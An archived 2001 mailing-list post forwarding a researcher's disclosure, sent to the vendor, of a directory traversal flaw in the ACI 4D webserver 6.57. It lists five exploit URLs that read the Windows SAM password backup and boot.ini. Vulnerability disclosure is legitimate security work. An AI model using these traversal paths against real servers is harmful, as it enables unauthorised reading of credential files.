|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: KRFinisterre
checkfree.comDate: Mon Aug 20 2001 - 09:51:00 CDT
----- Forwarded by Kevin R Finisterre/OH/CheckFree on 08/20/2001 10:43 AM
-----
KF <dotslashsnosoft.com>
Sent by: To: sales4D.com, reconsnosoft.com
elguapoclmboh1-smtp3.colum cc:
bus.rr.com Subject: I have found a security hole in your product...
08/18/2001 09:39 PM
vendor: http://www.4d.com/
current version: 6.7
tested version: 6.57 , others?
This directory transversal hole seems to work on
ACI 4d webserver running on the NT platform. I would imagine
exploitation on a macos box would be similar but would require
the proper mac filesystem path to the file you wish to view.
Server: ACI-4D/6.57
http://host + one of the following urls.
/4DBin/_/C:/winnt/repair/sam._
/4DBin/_/../winnt/repair/sam._
/4DBin/_/C:/inetpub/../boot.ini
/4DBin/_/../boot.ini
/4DBin/_/../inetpub/../boot.ini
-KF
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]